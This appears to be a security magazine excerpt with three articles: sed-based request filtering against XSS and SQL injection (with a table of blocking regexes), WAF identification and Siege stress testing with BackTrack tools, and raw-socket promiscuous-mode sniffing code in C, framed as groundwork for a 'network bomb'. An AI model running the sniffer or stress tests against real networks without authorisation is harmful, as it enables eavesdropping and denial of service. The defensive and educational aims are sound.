CISSP, CSSLP, is currently a Director of Security Solutions Architecture at a Fortune 100 Healthcare Company in the US. He has more than 10 years of Information Security experience in many large organizations in the US and Europe.

Fernando Perez
is currently a Manager of Application Security Architecture at a Fortune 100 Healthcare Company in the US. He has more than 10 years of Information Security experience, and is a former PCI Qualified Security Assessor (QSA).




Web Server SED Filtering


Colin Renouf

The principles underlying a good security solution are that it should be multi-layered, consider each component as being at risk in itself, and should consider all of the components interacting together as a whole as both the solution and an area of potential exploitation. It is this last principle that is often neglected.
In this article, and the related ones to follow, we will consider some new additions that can be applied to some of the layers to provide both local and distributed protection, and that are flexible enough to allow immediate tuning to protect against many newly found industry vulnerabilities before official fixes are available. The aim of all of these articles is to introduce a flexible and powerful distributed security solution that will fit into almost any environment.

Distributed Layers

Most web-based systems these days consist of a number of common layers that can essentially be considered standard commodities, configured and used the same way in all environments. One of the most common eCommerce deployment architectures builds upon an application server, probably written in Java, using some servlet engine that builds upon the Apache Tomcat reference implementation to add additional features, e.g. web service standards support, clustering and management facilities. More recently, for media and some simple sites, PHP based technologies are growing in importance, and there are examples on the web of the configuration (although not the security filtering technique) for PHP deployments. Knowledge of the deployment architecture gives the mischievous or criminal fraternity inroads to more easily explore the vulnerabilities that may exist in the environment. This may start with the simple task of using a search engine to look up known vulnerabilities or, for open source based products, examining the source code. With PHP there are many documented avenues of attack, but due to the lesser prevalence of documented Java engine exploits, systems administrators often feel safer than they should, ignoring the easy approaches to reverse engineering Java code using tools such as jad, the Java JVM's -verbose:class option, and reflection features. Assuming safety in today's world is foolish, so various techniques are implemented by the astute security administrator. One important thing to note, however, is that C represents strings as character arrays, usually with 8 bit ASCII characters, terminated with a NULL character. Java uses Unicode and under the covers stores the length of the String. The machine

may represent the individual bytes in one ordering and the network in another, i.e. big endian or little endian. These different representations can be used by the clever hacker to produce an attack that makes use of the data representation conversions that take place on the boundaries, bypassing security in one layer by relying on the conversion going on behind it to create an attack string. We will cover this in another article; the thing to understand is that each layer must have its own defences and not rely entirely on what sits in front of it. Many attacks come from within the external firewalls, e.g. from staff, so even in a simple case where the same technologies are used throughout and no conversion occurs, defences are still needed in each layer. Commonly, SQL Injection attacks are used to get unauthorized access to data in the database, and cross-site scripting (XSS) attacks are used to embed scripts into web pages to exploit unsuspecting users. Thus, these two threats must be countered to reduce the related vulnerabilities. It is within this context that the sed filtering capabilities of the web server layer are introduced. Essentially, this layer introduces regular expression filtering into the request and response flow into and out of the web server layer. In another article we will examine similar facilities in the Java application server layer in Java servlet filters, and look at techniques to ensure the request-response pairs stay related. Here, the web server layer, usually written in C and derived from earlier Apache or Netscape httpd implementations with plug-in modules to extend them, will be our focus. There have been filtering functions within web servers for a while, but this article will concentrate on the recent related sed SAF filter (for iPlanet and derivatives) and mod_sed filter (for Apache and derivatives), which implement the Unix stream editor SED functionality in a plugin module for the web server itself, providing considerable functionality for checking and manipulating web server requests and responses. For example, it would be possible to check for credit card patterns being displayed on a web page and obfuscate them to meet the Payment Cards Industry (PCI) objectives. The sed filter functionality is based on the Solaris 10 sed, stream editor, executable source code, which processes one


or more basic regular expressions as part of a script. Actually, it's a little more complex than this, as there are two different sed implementations on Solaris: one from the BSD compatible implementation, which is used in the Apache mod_sed content filter, and a newer, pure post-SVR4 implementation, as used in the Oracle iPlanet Web Server 7 (formerly Sun Java System Web Server 7) sed filter implementation. The Apache version is written to the Apache APR portable module functionality, and the Oracle iPlanet Web Server version is written to the NSAPI module functionality. The basic regular expression support, rather than the extended regular expression support, includes branching and the saving of a buffer for later use. To change the string Hello to Goodbye anywhere in a line with the traditional sed functionality with a basic regular expression, the command
s/Hello/Goodbye/g

is used, where the s instigates the search, the two slash (/) delimited strings identify the string to replace and its target replacement, and the g indicates the operation is to be performed globally within the line up to the newline character. To perform optional if-else type operations the branch (b) syntax is used, which in reality is more of a goto operation. For example, to change a string containing the text STATUS to say closed if the day is Sunday and open otherwise, the following set of commands is used:

/Sunday/ b ifpart
s/STATUS/open/g
b end
:ifpart
s/STATUS/closed/g
:end

To encode the basic regular expressions in the Oracle iPlanet Web Server 7, the obj.conf file is updated with sed= entries to signify each sed instruction, with the Input fn or Output fn directives identifying whether the input or output streams are to be modified. For the Apache and Oracle HTTP Servers, the InputSed and OutputSed directives are used in the httpd.conf file.

How it works

The concept of the sed filter and how it helps protect a site from some attacks is a simple one. The filter sits in the request and response flow of the web server and examines each request as a string for comparison against a set of configured regular expressions. It doesn't get access to the headers, only the request contents, as it implements in-process content filtering functionality. The set of regular expressions, implemented using the basic regular expression syntax, must not be large, to avoid impacting performance, but must be substantial enough to protect against major threats at the web server layer. The filters can intervene in both HTTP requests and responses, but for the exercise here only request filters are used, to remove any key strings identified in the instruction after the s, with the search string between the first set of forward slashes and the string to replace it with (in most cases nothing) between the second set of forward slashes. The g says to perform the change globally. Some characters are special characters and must be escaped with a backslash (\). The complete set of sed instructions is compiled and executed against the buffer for the request contents (or response, if used). For example, to replace the < symbol with the more appropriate &lt; processing instruction, the filter expression is:

s/</\\&lt;/g

Oracle iPlanet Web Server 7

With the Oracle iPlanet Web Server 7, the sed filter functionality is delivered as an NSAPI filter in the form of the libsed.so shared object that ships with the product. Configuring the web server to perform filtering requires merely configuration in the obj.conf configuration file for the given web site:

Input fn=insert-filter filter=sed-request method=(GET|HEAD|POST|PUT)
sed=s/</\\&lt;/g
sed=s/%3c/\\&lt;/g
sed=s/%3C/\\&lt;/g
sed=s/>/\\&gt;/g

Here the Input fn directive is used to initiate the insert-filter function for the GET, HEAD, POST, and PUT HTTP methods, with the sed-request filter interceding in requests; nothing is configured here for interceding in responses. Each sed= regular expression instruction is then executed in order for each request.

Apache-based Web Servers

For Apache-based web servers derived from the v2.2 and above code base, things may be a little more complex, as the mod_sed.so module is not usually shipped with the default build; it is an add-on module that makes use of the Apache 2 DSO (Dynamic Shared Object) support, which should be compiled into the product via the mod_so.c module and is enabled using LoadModule statements in httpd.conf. First, a check is needed to make sure the mod_so module has been compiled in, so run httpd -l:

$ httpd -l
Compiled in modules:
  core.c
  prefork.c
  http_core.c
  mod_so.c

Next the module must be built for installation into the web server. The mod_sed code can be downloaded from the Apache web site http://httpd.apache.org. To build the module, the httpd-devel package must be installed, i.e. as root execute yum install httpd-devel, which will install the necessary Apache Extension Tool, apxs, into the /usr/sbin directory. Download the files for the module itself from the Apache httpd trunk using subversion, i.e.
svn co http://svn.apache.org/repos/asf/httpd/httpd/trunk/modules/filters/

From the filters directory that this creates copy the following files into a separate directory:

regexp.c
regexp.h
sed0.c
sed1.c
sed.h
mod_sed.c
libsed.h

Compile these into an Apache module using the apxs Apache extension tool like so:

apxs -c mod_sed.c sed0.c sed1.c regexp.c

When all has been compiled successfully, merely copy the mod_sed.so shared object into the modules subdirectory of the web server (e.g. /etc/httpd/modules on my CentOS servers).
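Once the module is in place, a minimal httpd.conf fragment to load it and apply request filtering might look like the following sketch (the directory path and the patterns are illustrative; the InputSed directive and the Sed filter name ship with mod_sed):

# Load the freshly built module (path relative to ServerRoot)
LoadModule sed_module modules/mod_sed.so

<Directory "/var/www/html">
    # Attach the Sed input filter to PHP content and strip
    # angle brackets from incoming request bodies
    AddInputFilter Sed php
    InputSed "s/</\\&lt;/g"
    InputSed "s/%3c/\\&lt;/g"
    InputSed "s/%3C/\\&lt;/g"
</Directory>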

SQL injection and Cross-Site Scripting basic regular expressions

The following basic regular expressions provide some simple and fast protection against cross-site scripting and SQL injection attacks at the web server level. However, with cross-platform attacks that rely on the different representations of information in different layers, some information can often get past basic filtering, so this sort of filtering should also be applied at additional layers behind the web server (i.e. the application server and database server) to provide real protection and to prevent attacks from inside the firewall (e.g. from trusted staff). With the Oracle iPlanet Web Server, each of these regular expressions, which allow for mixed case, is added within a sed= clause, from where it is compiled, as outlined above (Table 1).

Table 1. Regular Expressions

Regular Expression | Operation | Category
s/</\\&lt;/g | Removes left angle bracket < | XSS
s/%3c/\\&lt;/g | Removes left angle bracket < | XSS
s/%3C/\\&lt;/g | Removes left angle bracket < | XSS
s/>/\\&gt;/g | Removes right angle bracket > | XSS
s/%3e/\\&gt;/g | Removes right angle bracket > | XSS
s/%3E/\\&gt;/g | Removes right angle bracket > | XSS
s/\\<[sS][eE][lL][eE][cC][tT]\\>.{0,40}\\<[uU][sS][eE][rR]\\>//g | Removes select X user | SQL Injection
s/\\<[sS][eE][lL][eE][cC][tT]\\>.{0,40}\\<[sS][uU][bB][sS][tT][rR][iI][nN][gG]\\>//g | Removes select X substring | SQL Injection
s/\\<[sS][eE][lL][eE][cC][tT]\\>.{0,40}\\<[aA][sS][cC][iI][iI]\\>//g | Removes select X ascii | SQL Injection
s/\\<[aA][lL][lL]_[oO][bB][jJ][eE][cC][tT][sS]\\>//g | Removes all_objects (Oracle PL/SQL specific) | SQL Injection
s/\\<[dD][rR][oO][pP]\\>//g | Removes drop | SQL Injection
s/\\<[sS][yY][sS][dD][bB][aA]\\>//g | Removes sysdba (Oracle PL/SQL specific) | SQL Injection
s/\\<[sS][uU][bB][sS][tT][rR][iI][nN][gG]\\>//g | Removes substring | SQL Injection
s/\\<[rR][oO][wW][nN][uU][mM]\\>//g | Removes rownum (Oracle PL/SQL specific) | SQL Injection
s/\\<[uU][tT][lL]_[hH][tT][tT][pP]\\>//g | Removes utl_http (Oracle PL/SQL specific) | SQL Injection
s/\\<[sS][eE][lL][eE][cC][tT]\\>.*?\\<[tT][oO]_[nN][uU][mM][bB][eE][rR]\\>//g | Removes select X to_number | SQL Injection
s/\\<[gG][rR][oO][uU][pP]\\>.*\\<[bB][yY]\\>.{1,100}?\\<[hH][aA][vV][iI][nN][gG]\\>//g | Removes group by X having | SQL Injection
s/\\<[sS][eE][lL][eE][cC][tT]\\>.*?\\<[dD][aA][tT][aA][tT][yY][pP][eE]\\>//g | Removes select X data_type | SQL Injection
s/\\<[iI][sS][nN][uU][lL][lL]\\>[^a-zA-Z_0-9]*?\x28//g | Removes isnull X | SQL Injection
s/\\<[uU][nN][iI][oO][nN]\\>.{1,100}?\\<[sS][eE][lL][eE][cC][tT]\\>//g | Removes union X select | SQL Injection
s/\\<[iI][nN][sS][eE][rR][tT]\\>[^a-zA-Z_0-9]*?\\<[iI][nN][tT][oO]\\>//g | Removes insert X into | SQL Injection
s/\\<[sS][eE][lL][eE][cC][tT]\\>.{1,100}?\\<[cC][oO][uU][nN][tT]\\>.{1,100}\\<[fF][rR][oO][mM]\\>//g | Removes select X count Y from | SQL Injection
s/\x3B[^a-zA-Z_0-9]*?\\<[dD][rR][oO][pP]\\>//g | Removes ; X drop | SQL Injection
s/\\<[dD][bB][mM][sS]_[jJ][aA][vV][aA]\\>//g | Removes dbms_java (Oracle PL/SQL specific) | SQL Injection
s/\\<[nN][vV][aA][rR][cC][hH][aA][rR]\\>//g | Removes nvarchar | SQL Injection
s/\\<[uU][tT][lL]_[fF][iI][lL][eE]\\>//g | Removes utl_file (Oracle PL/SQL specific) | SQL Injection
s/\\<[iI][nN][nN][eE][rR]\\>[^a-zA-Z_0-9]*?\\<[jJ][oO][iI][nN]\\>//g | Removes inner X join | SQL Injection
s/\\<[sS][eE][lL][eE][cC][tT]\\>.{1,100}?\\<[fF][rR][oO][mM]\\>.{1,100}?\\<[wW][hH][eE][rR][eE]\\>//g | Removes select X from Y where Z | SQL Injection
s/\\<[iI][nN][tT][oO]\\>[^a-zA-Z_0-9]*?\\<[dD][uU][mM][pP][fF][iI][lL][eE]\\>//g | Removes into X dumpfile | SQL Injection
s/\\<[dD][eE][lL][eE][tT][eE]\\>[^a-zA-Z_0-9]*?\\<[fF][rR][oO][mM]\\>//g | Removes delete X from | SQL Injection
s/\x3B[^a-zA-Z_0-9]*?\\<[sS][hH][uU][tT][dD][oO][wW][nN]\\>//g | Removes ; X shutdown | SQL Injection
s/\\<[dD][bB][aA]_[uU][sS][eE][rR][sS]\\>//g | Removes dba_users (Oracle PL/SQL specific) | SQL Injection
s/\\<[sS][eE][lL][eE][cC][tT]\\>.{1,100}?\\<[tT][oO][pP]\\>.{1,100}?\\<[fF][rR][oO][mM]\\>//g | Removes select X top Y from | SQL Injection
s/\x5cjavafiles\\>//g | Removes @javafiles | Host and Java Security
s/\\<[lL][oO][cC][aA][lL][hH][oO][sS][tT]\\>//g | Removes localhost | Host Security
s/\\<[aA][lL][eE][rR][tT]\\>//g | Removes alert | JavaScript
s/\\<[sS][oO][uU][rR][cC][eE]\\>//g | Removes source | JavaScript
s/\\<[fF][uU][nN][cC][tT][iI][oO][nN]\\>//g | Removes function | JavaScript
s/\\<[wW][iI][nN][dD][oO][wW]\\>//g | Removes window | JavaScript

Note that all of the above completely remove the problem strings, and for real production implementations it may be preferable to just obfuscate the strings with # characters, in which case the second pair of slashes above would contain the appropriate number of # characters, e.g. s/\\<[wW][iI][nN][dD][oO][wW]\\>//g would become s/\\<[wW][iI][nN][dD][oO][wW]\\>/######/g.

Testing

With the implementations above, one thing that requires careful configuration is the ordering of the filtering and the proxying in the web server modules, remembering that most Java application servers use a plugin module to proxy the application server and forward requests. It is best to test the proxying independently, and then test the filtering with simple basic HTML and PHP, before combining the two and getting into order-of-processing issues and configuration complexities. For testing the combination I usually write a simple client that forwards some problem text, and change the Apache sample Snoop JSP to echo the response. To the example snoop.jsp just add:

<br>
Request:
<%
    java.io.BufferedReader in = request.getReader();
    StringBuffer sb = new StringBuffer();
    String input;
    // Read the request body line by line and collect it
    while ((input = in.readLine()) != null) {
        sb.append(input);
    }
    // Echo the collected request back in the response
    out.write(sb.toString());
%>

And in the client code just open a socket, create a buffer with the problem strings including some you want left alone and send the request:

// Create the socket address to use for the call
SocketAddress sockaddr = new InetSocketAddress(addr, port);

// Create an unbound socket
Socket client = new Socket();

int timeout = DEFAULT_TIMEOUT;
if (args.length == 4) {
    timeout = Integer.parseInt(args[2]);
}

// This method will block for no more than the timeout.
// If the timeout occurs, SocketTimeoutException is thrown.
client.connect(sockaddr, timeout);

// Build the data we are sending to the socket
StringBuffer data = new StringBuffer();
for (int i = 0; i < TESTS.length; i++) {
    data.append(URLEncoder.encode(KEY_TEXT
            + (new Integer(i + 1)).toString(), UTF8_TEXT));
    data.append(EQUALS_TEXT);
    data.append(URLEncoder.encode(TESTS[i], UTF8_TEXT));
    data.append(AMPERSAND_TEXT);
}

// Now we have our socket we send requests to it,
// and echo what we are sending to the screen
System.out.println(LINE_TEXT);
BufferedWriter wr = new BufferedWriter(new OutputStreamWriter(
        client.getOutputStream(), UTF8_TEXT));
wr.write(METHOD_TEXT + SPACE_TEXT + PATH_TEXT + SPACE_TEXT
        + HTTP_TEXT + CARRIAGE_RETURN_LINE_FEED);
wr.write(HOST_TEXT + SPACE_TEXT + LOCALHOST_TEXT
        + CARRIAGE_RETURN_LINE_FEED);
wr.write(CONTENT_LENGTH_TEXT + SPACE_TEXT + data.length()
        + CARRIAGE_RETURN_LINE_FEED);
wr.write(CONTENT_TYPE_TEXT + CARRIAGE_RETURN_LINE_FEED);
wr.write(CARRIAGE_RETURN_LINE_FEED);

// Send data
wr.write(data.toString());
wr.write(CARRIAGE_RETURN_LINE_FEED);

If all of the above configuration has been performed properly, the result should be that the problem strings are removed from the request text. However, it should be noted that this configuration is hard and differs between application servers. The author has generally found iPlanet deployments with the WebLogic Server easier, but that is more due to longer experience and many hours of trial and error with the help of the original Sun/Oracle iPlanet developers who developed the sed filter/mod_sed modules, rather than anything inherently more problematic with the technology. This technique has been successfully used at a large international bank and an international foreign exchange company to provide additional lockdowns. References to the technology can now be found on the OWASP site. Further information can be found at:

httpd.apache.org/docs/trunk/mod/mod_sed.html
https://blogs.oracle.com/basant/entry/little_history_behind_mod_sed

Colin Renouf
is an Enterprise Architect and author in the UK financial services industry; working with security, Java/JavaEE, networking, Unix/Linux and general architecture in the UK. He also more than dabbles in the world of psychology, human learning, and astronomy with particle physics etc.; having studied IT, aeronautical engineering, social sciences and more in his life as an eternal part time student. When not working, writing or being verbally abused by his children, he loves photography, singing, playing guitar, drinking wine, and chatting for hours on end with his friends elsewhere in the world, certain of whom he competes with, but would love to spend more real time in the same country with. Colin is always happy to help anyone and loves fine technical debate that involves improving the state of the industry and mankind.




Web Application Firewalls, How Tough Are They Now?


Manfred Ferreira

What you will learn
How to identify a WAF
How to run a vulnerability assessment based on the OWASP Top 10 Web Application Security Risks
How to run a stress tool application against a web application

What you should know


How to run BackTrack
How to interconnect BackTrack to a network
Routing configuration, if needed, for laboratories and virtual environments

WAFs have existed since the last century, being implemented in regular cycles for more than 15 years; now they are back with full capability and are faster than ever before. Due to the exponential performance of the hardware they integrate with in appliances, capability at layer 7 of the OSI model is assured; in particular, the HTTP and HTTPS protocols are fully covered. The link throughput capabilities are amazing, being capable of 10 Gb analysis with no impact beyond a few microseconds of delay. We propose three steps to obtain metrics concerning WAF identification, correct WAF configuration against the OWASP Top

10 Web Application Security Risks, and WAF and Web server capability against multiple simultaneous Web page requests. I should advise all readers that all the actions described in this article should be carried out with the proper approval documentation from the Web site owners and security managers, except in the case of laboratories and virtual environments specific to those tests. Keep in mind that carrying out such an attack without the right approval is illegal. There are multiple applications available on the market capable of testing WAFs and Web servers; to me, lowering the


investment and having at the same time access to multiple tools, I prefer to use the BackTrack distribution; the latest version 5, release 2 or 3, is perfect. To give a view of a semi-complex network topology (it is always important to have references for what we are discussing and testing), I have developed an illustration, Figure 1, to establish a baseline.

Figure 1. Network Topology

The network topology shows multiple pieces of equipment and technologies that are normally available. I could increase the complexity by adding IPS/IDS or aggregating the technologies in a Cloud environment, virtualizing the database and Web servers, but for better visualization they are spread out. From an external point of view, I prefer to put a group of firewalls filtering all the traffic and protecting all the perimeter networks before the WAF group, which is more dedicated to Web services and databases. I leave open the discussion of whether the network topology should have IPS/IDS functions and DNS servers represented in the firewall group, but for this purpose, and at this level, I do not represent them, to keep the topology as simple as possible. Initially we do not know whether the company has WAF technology, so the first step is to verify whether a WAF exists in the network at all. Opening the BackTrack distribution and accessing the waffit code through the graphical interface, we reach the waffit directory (Figure 2).

Figure 2. Waffit environment

After opening the waffit directory, we access the Python code developed by Sandro Gauci and Wendel G. Henrique, wafw00f.py; we just have to invoke the command followed by the web site to test. Do not forget the http:// prefix, otherwise it will not work.
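A typical invocation from the waffit directory looks like the following (the path is typical of a BackTrack 5 layout and the target URL is illustrative):

cd /pentest/web/waffit
./wafw00f.py http://www.example.com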

Figure 5. Waffit second advanced response

Comparing the third web site tested to the previous tests, we can verify that the number of closed connections has increased, proving that the technology implemented in this company is far more capable. Of the 10 requests, 3 were closed. At this point, the reader may be wondering whether all company sites have WAF technology. In fact, some of the best firewall manufacturers have introduced a simplified level of WAF technology, integrated with the IPS function. To be able to distinguish them, I introduce a typical IPS response from one of those manufacturers.

Figure 3. Waffit command

When the application starts, it will ask whether the reader wants to update the W3AF database; it is always good to update the database weekly, or whenever you need to work with it. At this point, we just have to fill in the target URL or IP address and, in the profile list, choose OWASP_TOP10. The plugin will be activated automatically. With everything in place, the Start button will run the Web tests. The alert types, high, medium and low, are shown in the bottom-right corner, increasing whenever a non-conformity is detected, which can represent a detected vulnerability or just an incorrect link page. The results are aggregated and available in the third tab, after Scan config and Log.

Figure 6. Firewall/IPS response

The result has a lower number of tests and the number of closed connections is higher. The response from the waffit code is similar; when it is not sure of the technology, it always delivers the phrase "seems to be behind a WAF". After the first approach has been done, it is time to step into the second phase. The WAF technology has to deliver at least the correct interaction when confronted with the Top 10 Web Application Security Risks. One worldwide not-for-profit charitable organization focused on those problems, OWASP, the Open Web Application Security Project, has addressed the top 10 risks through a dedicated project; they are listed:

A1: Injection
A2: Cross-Site Scripting (XSS)
A3: Broken Authentication and Session Management
A4: Insecure Direct Object References
A5: Cross-Site Request Forgery (CSRF)
A6: Security Misconfiguration
A7: Insecure Cryptographic Storage
A8: Failure to Restrict URL Access
A9: Insufficient Transport Layer Protection
A10: Unvalidated Redirects and Forwards

Figure 8. W3AF configuration

With the W3AF application it is also possible to verify the HTTP response and compare it to the waffit output. The next illustration shows the response to one of our tests. To access the fuzzy requests, choose the wheel icon at the top of the W3AF application, marked with a green circle, and change the host identification to the web site URL.

The BackTrack distribution has vulnerability scanning capability for executing web site tests. One such scanner is W3AF, the Web Application Attack and Audit Framework from Andrés Riancho, which in fact already has a profile covering the OWASP Top 10 security risks. This makes our lives much easier than running all the tests manually. To access the graphical interface of W3AF, just follow the next illustration.
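If you prefer the command line, the framework also ships launcher scripts alongside the GUI; a sketch, assuming the usual BackTrack path for w3af:

# cd /pentest/web/w3af
# ./w3af_gui

(./w3af_console starts the text-mode interface instead.)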

Figure 9. W3AF request

Besides the typical system information and web application version, the reader can verify that the code 404 Not Found was generated against the /$range(10)$ input web code. At this point the third phase is starting: after the identification phase and a common vulnerability scan have been performed, it is the right time to test the principal equipment supporting the client/server communication, especially the Web Servers, load balancers and WAF, and their response to a DoS attempt. I will introduce the Siege application from Jeffrey Fulmer, also available in the BackTrack distribution, which has the capability of generating multiple requests. To access the Siege application, follow the next illustration.
Figure 7. W3AF application.

If the reader has access both to this tool and to the monitoring consoles of the equipment, I advise keeping an eye on that equipment; if it reaches 80% to 90% of its capacity, it is time to stop. Otherwise, apply a period of progression/standstill, stopping at 5 minutes, then 15 minutes, then 30 minutes. I do not recommend running this type of test for more than 2 hours. Always verify the log files to get a notion of the delay and stress imposed.

Figure 12. Siege log output

Figure 10. Siege application.

If the reader is running the Siege application for the first time, siege.config must be run to generate the configuration file. If the reader wants to test a partial page or a group of pages, one of the parameters to pass is the list of URLs; for these tests we will provide just two URLs. For better performance and analysis, however, the principal URLs should be included: the more URLs in the list, the better notion the reader will have of the actions taken by the WAF and load balancer. Edit the file /etc/urls.txt with the vi command and input as many URLs as you can, always associated with the Web site that you want to test. Commands executed in the BackTrack distribution, on the command line:
# vi /etc/urls.txt
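As a sketch, the file might contain entries like these; the hostnames and paths are placeholders for your authorised target:

http://www.example.com/
http://www.example.com/login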

To conclude, compare the longest and shortest transactions; they should not differ by more than 3 to 5 seconds. Check the logs or reports concerning the actions taken by the WAF application and firewalls. Take into account the number of closed connections and any information that could indicate a denial of service attack. Look at the CPU allocation and network bandwidth.

Conclusion

As a summary of all the actions taken throughout this article, the reader is able to identify WAF applications, obtain comparisons against firewalls and IPS systems, execute a middle level of vulnerability scanning and, in the last phase, run a stress-testing program. Those metrics are essential to maintain control over the business and the company network at the level of identifying risks, business continuity needs and accurate security measures. A special focus on patch management, code revision and bandwidth control is normally needed for permanent problem-solving actions.

Press i for insert and write down all the URLs, starting each line with http://. At the end, when you do not want to list more URLs, press Esc and then type :wq, which means write and quit. For more vi commands, just type man vi to access the vi manual. After the configuration file is in place, it is time to execute Siege: just type siege to run it. It will check the list of URLs in the /etc/urls.txt file and start running the stress program. To stop the test, press Ctrl + C and the program will be interrupted. The illustration shows the commands executed until the end of the program.
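Concurrency and duration can also be set explicitly on the command line; the values below are illustrative only (-c simulated users, -t test duration, -f the URL file):

# siege -c 25 -t 5M -f /etc/urls.txt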

Manfred Ferreira
is currently an Independent Information Security Consultant & GRC Advisor who has worked for 16 years in the information security market, developing projects for the European Committee in the early years. He is business-oriented and provides Business Continuity Management and Information Security advisory services. He is specialized in security solution assessment and penetration testing in the context of risk identification and mitigation. Part of this information is disclosed on the professional network LinkedIn: pt.linkedin.com/pub/manfred-ferreira/15/536/698 E-mail: manfredf@zonmail.pt

Notes
Software and information available to support the tests:
BackTrack 5 r3, http://www.backtrack-linux.org/downloads
OWASP, https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project
W3AF, http://w3af.sourceforge.net
VI, http://anaturb.net/vim_1.htm

Figure 11. Siege running

Sockets API and TCP/IP Protocols


The core of an attack
Colin Renouf

Recently, whilst writing test tools for an implementation of a security defence mechanism, a realisation came to the fore as to just how easy it is to write code for attacks. The truth is that the mechanisms put into the sockets API and the TCP/IP protocols in the early days to make them easy to manage are also what now provides the core on which to mount an attack. As every good security professional knows, it is important to balance the security of a solution with the cost, which usually relates to ease of implementation and management as much as to new software and hardware.
In this article we will look at the problem at the core of the sockets API, used on multiple platforms as the interface to the TCP/IP communications mechanisms, together with a brief overview of the TCP/IP and Ethernet protocols and how the very mechanisms they use to ease management present a risk to any network. These two pieces of knowledge can be combined to produce what I refer to as the network bomb: a simple mechanism to bring down all or a portion of a company network, with more damage possible the closer the bomb can be placed to the central core of the network.

The Sockets API PF_PACKET and IFF_PROMISC

Most people in the IT profession will have heard of the sockets API. It was introduced into the early Unix world as part of the Berkeley Software Distribution branch of Unix to ease the implementation of networking code, essentially abstracting the network implementation code behind a file handling paradigm. With the sockets API, from a client perspective, a socket is declared as a particular type; is opened, or more accurately connected, using a connect call; is then written to or read from; and is finally closed; all much like reading or writing a file. From the server perspective, the server will bind the socket to a port, will listen on that port for requests, and when each request comes in it will accept the request. Where only a single packet is to be handled, simpler sendto and recvfrom calls are available. The API suite also contains functions to look up hosts by name and to convert between the host byte representation and the network representation. All of these are documented heavily elsewhere and are generally well understood. What is generally not well understood is the variation in uses of the sockets API that has generally fallen into disuse, but

were essential in the early days and represents a risk to the modern TCP/IP network. Many IT professionals will be familiar with Ethereal or Wireshark for promiscuous-mode packet sniffing, but may not realise how easy it is to write your own implementation using nothing more than a few small changes to the parameters of standard sockets calls. Once the subtlety of the changes to the standard sockets application code is understood, it becomes evident that it is easy to write code to listen to wireless networks without actually connecting, or to write a TCP/IP packet or Ethernet frame for transmission with any source or destination parameters, or structure, that you want. This represents a great risk, as much of the TCP/IP protocol suite relies on some fair play. First, let's look at a typical socket API call to create a socket.
socket(PF_INET, SOCK_STREAM, IPPROTO_TCP)

In this call, which is fairly standard as sockets calls go, the API is told to open a standard IP socket, with a socket stream to read from it, and that the IP protocol to use is TCP. To provide direct access to the IP stack and below, we simply change PF_INET to PF_PACKET, and the underlying socket type to SOCK_RAW, to get access to a raw socket including the Ethernet headers, rather than just the IP packet as would be seen if SOCK_DGRAM were used. To see everything from the IP perspective only, as implemented on top of an Ethernet frame, we use a final parameter of ETH_P_IP. That is almost all there is to it, but not quite all: using ETH_P_ALL for the last parameter allows the Ethernet communications to be accessed. This gives us,
socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))

where the htons converts the data byte ordering representation from the host to the network format and should always be used for portable code. The PF_PACKET/SOCK_RAW combination is actually a Linux artifact, so it is on Linux, usually the hacker's platform of choice, that the tooling exists; although the sockets API itself is portable, the code examples here are not.
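Purely for orientation, and not taken from the original listings, here is the classic client-side lifecycle described earlier as a minimal sketch; the address, port and request are placeholders, and error handling is kept to the bare minimum.

#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <sys/socket.h>

int main(void) {
    // Declare the socket as a TCP/IP stream socket
    int s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);

    struct sockaddr_in addr;
    memset(&addr, 0, sizeof(addr));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(80);                        /* placeholder port */
    inet_pton(AF_INET, "192.0.2.1", &addr.sin_addr);  /* placeholder host */

    // Connect, write, read, close; just like file handling
    if (connect(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("connect");
        return 1;
    }
    const char *req = "HEAD / HTTP/1.0\r\n\r\n";
    write(s, req, strlen(req));

    char buf[512];
    int n = read(s, buf, sizeof(buf) - 1);
    if (n > 0) { buf[n] = '\0'; printf("%s", buf); }
    close(s);
    return 0;
}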

Code to listen to the packets by copying them into a big enough buffer is now simply written with a call to recvfrom. On Linux the user must have root access.

while (1) {
    n = recvfrom(sock, buffer, 2048, 0, NULL, NULL);
}

To give structure to the output, the platform-specific headers are used, such as linux/in.h or linux/if_ether.h. The returned packet will contain the Ethernet header, followed by the IP header fourteen bytes in, and then the IP data. To output the source MAC address from the Ethernet header, just use:

ethhead = buffer;
printf("Source MAC: %02x:%02x:%02x:%02x:%02x:%02x\n",
       ethhead[0], ethhead[1], ethhead[2],
       ethhead[3], ethhead[4], ethhead[5]);

To get at the IP header, just move to the relevant offset:

iphead = buffer + 14;
printf("Source IP: %d.%d.%d.%d\n",
       iphead[12], iphead[13], iphead[14], iphead[15]);

Figure 1.

At this point the network card is still only allowing access to the frames, and the packets on top of them, that are addressed to the network card in this computer, as it is a function of the hardware/firmware combination to discard other frames and packets observed. To overcome this, the card must be placed into promiscuous mode, which allows examination of all traffic through the card wherever it is addressed. On most computers administrative or root access is required to switch the card into promiscuous mode, but the code itself is simply a combination of a simple portable ioctl call to get the current network card flags and a following call to flip the promiscuous flag itself, i.e. ethreq->ifr_flags |= IFF_PROMISC;. For a true Ethereal or Wireshark implementation on a heavily loaded network, this simple sockets code followed by printf calls to output the packet data would be too slow, but for most uses the code below followed by printf is all that is needed to watch EVERY packet seen by a WiFi card, without actually being connected to a WiFi network itself; remember the card is in promiscuous mode and is seeing the radio waves that form frames. Similarly, if the wlan0 device is replaced with a wired card device such as en0, then packets on a wired network can be monitored.

int sock;
unsigned char *iphead, *ethhead;
struct ifreq *ethreq;

// First open a raw socket direct to the card, with the level
// ETH_P_ALL saying we want to see everything at the Ethernet
if ( (sock = socket(PF_PACKET, SOCK_RAW, htons(ETH_P_ALL))) < 0 ) {
    perror("socket");
    exit(1);
}

// Now use ioctl to put the card into promiscuous mode
ethreq = (struct ifreq *) malloc(sizeof(struct ifreq));
strncpy(ethreq->ifr_name, "wlan0", IFNAMSIZ);
ioctl(sock, SIOCGIFFLAGS, ethreq);
ethreq->ifr_flags |= IFF_PROMISC;
ioctl(sock, SIOCSIFFLAGS, ethreq);
free(ethreq);

